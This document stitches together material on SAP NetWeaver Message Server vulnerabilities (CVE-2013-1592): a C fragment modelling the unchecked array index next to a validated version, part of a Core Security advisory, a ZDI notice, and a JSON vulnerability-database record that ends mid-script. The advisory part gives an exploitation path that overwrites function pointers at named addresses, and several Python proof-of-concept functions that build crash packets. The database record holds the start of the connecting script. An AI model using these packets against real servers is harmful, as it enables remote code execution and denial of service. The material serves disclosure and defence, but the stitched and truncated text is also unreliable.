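/* Nine 8-byte counters: 0x48 bytes, matching MSJ2EE_STAT_ELEMENT. */
typedef struct {
    uint64_t totalMsgCount;
    uint64_t totalMsgLength;
    uint64_t avgMsgLength;
    uint64_t maxLength;
    uint64_t noP2PMessage;
    uint64_t noP2PRequest;
    uint64_t noP2PReply;
    uint64_t noBroadcastMessage;
    uint64_t noBroadcastRequest;
} stat_element;

static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* The scaling the disassembly performs (lea esi,[eax+eax*8]; [esi*8]) in
 * 32-bit arithmetic.  Large ids wrap around, so the written slot can lie
 * below the table; a check performed after scaling would not catch this. */
uint32_t unchecked_slot_address(uint32_t table_base, uint32_t serviceid)
{
    return table_base + serviceid * 9u * 8u;
}

/* Parses the header and validates the index before it is used.
 * Returns 0 on success, -1 if the buffer is shorter than the header,
 * -2 if serviceid is not a valid index into j2ee_stat_services[]. */
int msj2ee_validate_header(const uint8_t *buf, size_t len,
                           uint32_t *serviceid, int32_t *totallength)
{
    if (buf == NULL || len < MSJ2EE_HEADER_SIZE)
        return -1;
    uint32_t id = rd_le32(buf + MSJ2EE_OFF_SERVICEID);
    if (id >= J2EE_STAT_SERVICES_LEN)   /* unsigned compare: no negative bypass */
        return -2;
    *serviceid = id;
    /* cdq in the original sign-extends totallength, i.e. it is treated as signed */
    *totallength = (int32_t)rd_le32(buf + MSJ2EE_OFF_TOTALLENGTH);
    return 0;
}

/* Hardened form of the two always-executed updates quoted above
 * (count += 1, length += totallength), applied only inside the table.
 * Rejecting a negative length is an extra precaution of this example. */
int add_statistics_checked(stat_element *table, const uint8_t *buf, size_t len)
{
    uint32_t id;
    int32_t total;
    int rc = msj2ee_validate_header(buf, len, &id, &total);
    if (rc != 0)
        return rc;
    if (total < 0)
        return -3;
    table[id].totalMsgCount += 1;
    table[id].totalMsgLength += (uint64_t)total;
    return 0;
}

/* Builds a constructed MSJ2EE_HEADER (little-endian, all other fields zero). */
void make_header(uint8_t out[MSJ2EE_HEADER_SIZE], uint32_t serviceid, uint32_t totallength)
{
    memset(out, 0, MSJ2EE_HEADER_SIZE);
    for (int i = 0; i < 4; i++) {
        out[MSJ2EE_OFF_SERVICEID + i]   = (uint8_t)(serviceid >> (8 * i));
        out[MSJ2EE_OFF_TOTALLENGTH + i] = (uint8_t)(totallength >> (8 * i));
    }
}
```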

After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation:

  1. Gaining remote code execution by overwriting function pointers. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the coarse granularity of the memory corruption, some of the most handy-to-exploit function pointers happen to be accessible only to administrative connections.
  2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server.

8.1.1. Gaining remote code execution by overwriting function pointers

Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet.

One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters:

/-----
.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]
.data:0087DED0 ; function pointers associated to the modification of the "ms/max_sleep" parameter
.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER
.data:0087DED0 ; function pointers associated to the modification of the "ms/max_vhost" parameter
.data:0087DED0                 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \
.data:0087DED0                                              offset MsSTestInteger, \   ;<-- we can overwrite this one
.data:0087DED0                                              offset MsSSetMaxVirtHost>

[...]
-----/

By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set').

After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet causes our overwritten function pointer to be called from the 'MsSChangeParam' function:

/-----
.text:00404DB3 loc_404DB3:                    ; CODE XREF: MsSChangeParam+CDj
.text:00404DB3 lea     esi, [edi+edi*2]
.text:00404DB6 mov     edi, [ebp+pvalue]
.text:00404DB9 add     esi, esi
.text:00404DBB mov     edx, ms_changeable_parameter.test[esi+esi]
.text:00404DC2 add     esi, esi
.text:00404DC4 push    edi
.text:00404DC5 push    pname
.text:00404DC6 call    edx                    ; call our overwritten function pointer
-----/

'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array.

8.1.2. Modify the configuration and behavior of the server

After gaining administrative privileges for our connections, it is possible to send 'MS_SET_PROPERTY' packets to the Message Server in order to modify its configuration and behavior. That makes it possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps:

  1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'.
  2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4].

The following python code can be used to trigger the vulnerability:

/-----
def send_attack(connection):
    print "[*] Sending crash packet"
    crash = '**MESSAGE**\x00' # eyecatcher
    crash+= '\x04' # version
    crash+= '\x00' # errorno
    crash+= server_name # toname
    crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key
    crash+= '\x04\x0d' # flag/iflag
    crash+= client_string # fromname
    crash+= '\x00\x00' # padd

    crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd"
    crash+= "\x00\x00\x00\x01"
    crash+= "\xff\xff\xff\xff"
    crash+= "\x00\x00\x00\x00"
    send_packet(connection, crash)

    print "[*] Crash sent !"
-----/

8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module.

The following python code can be used to trigger the vulnerability:

/-----
def send_attack(connection):
    print "[*] Sending crash packet"
    crash = '**MESSAGE**\x00' # eyecatcher
    crash+= '\x04' # version
    crash+= '\x00' # errorno
    crash+= server_name # toname
    crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key
    crash+= '\x04\x05' # flag/iflag
    crash+= client_string # fromname
    crash+= '\x00\x00' # padd

    crash+= "AD-EYECATCH\x00"
    crash+= "\x01\x01"
    crash+= "%11d" % 104
    crash+= "%11d" % 1
    crash+= "\x15\x00\x00\x00"
    crash+= "\x20\x00\x00\xc8"
    crash+= "LALA" + ' '*(20-4)
    crash+= "LOLO" + ' '*(40-4)
    crash+= " "*36
    send_packet(connection, crash)

    print "[*] Crash sent !"
-----/

  9. Report Timeline

  . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013.
  . 2012-12-10: Core sends an advisory draft with technical details and a PoC.
  . 2012-12-11: The SAP team confirms the reception of the issue.
  . 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day on Feb 12th 2013.
  . 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013.
  . 2012-12-28: SAP notifies Core that they will be contacted if tests fail in order to re-schedule the advisory publication.
  . 2013-01-22: First release date missed.
  . 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned.
  . 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosure on Feb 12th. Core also asks for additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to the security bulletin, CVEs, and patches in order to verify whether those patches effectively fix the reported flaws.
  . 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVEs were assigned to them. Those vulnerabilities seem to be related to ZDI advisories [6], [7], [8].
  . 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks for additional information regarding the affected and patched version numbers.
  . 2013-02-01: SAP notifies that the security note 1800603 will be released and that the note will provide further information regarding this vulnerability.
  . 2013-02-13: Advisory CORE-2012-1128 published.

  10. References

[1] http://www.sap.com/platform/netweaver/index.epx
[2] SAP Security note Feb 2013: https://service.sap.com/sap/support/notes/1800603
[3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm
[4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm
[5] SAP Security notes Feb 2012: https://service.sap.com/sap/support/notes/1649840
[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/
[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/
[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/

  11. About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

  12. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

  13. Disclaimer

The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

  14. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-104
June 27, 2012

-- CVE ID:

-- CVSS:
10, AV:N/AC:L/Au:N/C:C/I:C/A:C

-- Affected Vendors:
SAP

-- Affected Products:
SAP NetWeaver

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407.

-- Vendor Response:
SAP has issued an update to correct this vulnerability. More details can be found at:
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section40

-- Disclosure Timeline:
2011-10-28 - Vulnerability reported to vendor
2012-06-27 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * e6af8de8b1d4b2b6d5ba2610cbf9cd38

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202001-0832",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "netweaver",
        "scope": null,
        "trust": 2.1,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "sap",
        "version": "2004s"
      },
      {
        "model": "netweaver abap",
        "scope": null,
        "trust": 1.2,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "7.30"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "7.02"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "7.01"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": "7.01 sr1"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": "7.02 sp06"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": "7.30 sp04"
      },
      {
        "model": "netweaver abap null",
        "scope": "eq",
        "trust": 0.4,
        "vendor": "sap",
        "version": "*"
      },
      {
        "model": "netweaver 2004s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:sr1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:sp06:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:sp04:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      }
    ],
    "trust": 2.1
  },
  "cve": "CVE-2013-1592",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2013-1592",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "ZDI-12-112",
            "impactScore": 8.5,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "ZDI-12-111",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "ZDI-12-104",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": null,
            "accessVector": null,
            "authentication": null,
            "author": "IVD",
            "availabilityImpact": null,
            "baseScore": null,
            "confidentialityImpact": null,
            "exploitabilityScore": null,
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "impactScore": null,
            "integrityImpact": null,
            "severity": null,
            "trust": 0.2,
            "vectorString": null,
            "version": "unknown"
          },
          {
            "accessComplexity": null,
            "accessVector": null,
            "authentication": null,
            "author": "IVD",
            "availabilityImpact": null,
            "baseScore": null,
            "confidentialityImpact": null,
            "exploitabilityScore": null,
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "impactScore": null,
            "integrityImpact": null,
            "severity": null,
            "trust": 0.2,
            "vectorString": null,
            "version": "unknown"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2013-1592",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-1592",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "ZDI",
            "id": "ZDI-12-112",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "ZDI",
            "id": "ZDI-12-111",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "ZDI",
            "id": "ZDI-12-104",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "HIGH"
          },
          {
            "author": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2013-1592",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1592"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability. Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user supplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \\x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. \nThe following products are affected:\nSAP Netweaver 2004s\nSAP Netweaver 7.01 SR1\nSAP Netweaver 7.02 SP06\nSAP Netweaver 7.30 SP04. \n\nThe vulnerability is due to a memory pointer error while processing certain packets by the affected software. 
Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nCORE-2012-1128\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Message Server Multiple Vulnerabilities\nAdvisory ID: CORE-2012-1128\nAdvisory URL:\nhttp://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities\nDate published: 2013-02-13\nDate of last update: 2013-02-13\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n\n2. *Vulnerability Information*\n\nClass: Improper Validation of Array Index [CWE-129], Buffer overflow\n[CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1592, CVE-2013-1593\n\n\n\n3. By sending different messages,\nthe different vulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n   . Older versions are probably affected too, but they were not checked. \n\n5. *Non-vulnerable packages*\n\n   . Vendor did not provide this information. \n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note 1800603 [2] regarding these issues. \n\n\n7. *Credits*\n\nVulnerability [CVE-2013-1592] was discovered by Martin Gallo and\nFrancisco Falcon, and additional research was performed by Francisco\nFalcon. Vulnerability [CVE-2013-1593] was discovered and researched by\nMartin Gallo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Fernando Miranda from Core Advisories\nTeam. \n\n\n8. 
*Technical Description / Proof of Concept Code*\n\nThe following python script is the main PoC that can be used to\nreproduce all vulnerabilities described below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-d\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3900)\n(options, args) = parser.parse_args()\n\nclient_string = \u0027-\u0027+\u0027 \u0027*39\nserver_name = \u0027-\u0027+\u0027 \u0027*39\n\ndef send_packet(sock, packet):\n    packet = struct.pack(\"!I\", len(packet)) + packet\n    sock.send(packet)\n\ndef receive(sock):\n    length = sock.recv(4)\n    (length, ) = struct.unpack(\"!I\", length)\n    data = \"\"\n    while len(data)\u003clength:\n        data+= sock.recv(length)\n    return (length, data)\n\ndef initialize_connection(hostname, port):\n\n    # Connect\n    print \"[*] Connecting to\", hostname, \"port\", port\n    connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    connection.connect((hostname, port))\n\n    # Send initialization packet\n    print \"[*] Conected, sending login request\"\n\n    init = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    init+= \u0027\\x04\u0027 # version\n    init+= \u0027\\x00\u0027 # errorno\n    init+= client_string # toname\n    init+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    init+= \u0027\\x01\\x08\u0027 # flag / iflag (MS_LOGIN_2)\n    init+= client_string # fromname\n    init+= 